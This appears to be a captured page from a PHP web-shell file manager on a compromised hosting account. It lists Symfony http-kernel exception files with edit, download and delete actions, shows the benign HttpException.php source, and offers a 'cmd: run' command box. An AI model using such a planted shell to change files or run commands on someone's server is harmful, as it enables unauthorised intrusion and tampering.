/
home
/
techb158
/
ileadtechnology.com
/
SSM
/
vendor
/
symfony
/
http-kernel
/
Exception
/
/home/techb158/ileadtechnology.com/SSM/vendor/symfony/http-kernel/Exception
mkdir
upload
Name
Size
Mode
Actions
AccessDeniedHttpException.php
858
0644
edit
dl
rm
BadRequestHttpException.php
803
0644
edit
dl
rm
ConflictHttpException.php
801
0644
edit
dl
rm
ControllerDoesNotReturnResponseException.php
2334
0644
edit
dl
rm
GoneHttpException.php
797
0644
edit
dl
rm
HttpException.php
1133
0644
edit
dl
rm
HttpExceptionInterface.php
710
0644
edit
dl
rm
LengthRequiredHttpException.php
807
0644
edit
dl
rm
MethodNotAllowedHttpException.php
954
0644
edit
dl
rm
NotAcceptableHttpException.php
806
0644
edit
dl
rm
NotFoundHttpException.php
808
0644
edit
dl
rm
PreconditionFailedHttpException.php
811
0644
edit
dl
rm
PreconditionRequiredHttpException.php
859
0644
edit
dl
rm
ServiceUnavailableHttpException.php
1038
0644
edit
dl
rm
TooManyRequestsHttpException.php
1081
0644
edit
dl
rm
UnauthorizedHttpException.php
950
0644
edit
dl
rm
UnprocessableEntityHttpException.php
821
0644
edit
dl
rm
UnsupportedMediaTypeHttpException.php
813
0644
edit
dl
rm
Edit:
/home/techb158/ileadtechnology.com/SSM/vendor/symfony/http-kernel/Exception/HttpException.php
(1133B)
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpKernel\Exception; /** * HttpException. * * @author Kris Wallsmith <kris@symfony.com> */ class HttpException extends \RuntimeException implements HttpExceptionInterface { private $statusCode; private $headers; public function __construct(int $statusCode, string $message = null, \Throwable $previous = null, array $headers = [], ?int $code = 0) { $this->statusCode = $statusCode; $this->headers = $headers; parent::__construct($message, $code, $previous); } public function getStatusCode() { return $this->statusCode; } public function getHeaders() { return $this->headers; } /** * Set response headers. * * @param array $headers Response headers */ public function setHeaders(array $headers) { $this->headers = $headers; } }
Save
cmd:
run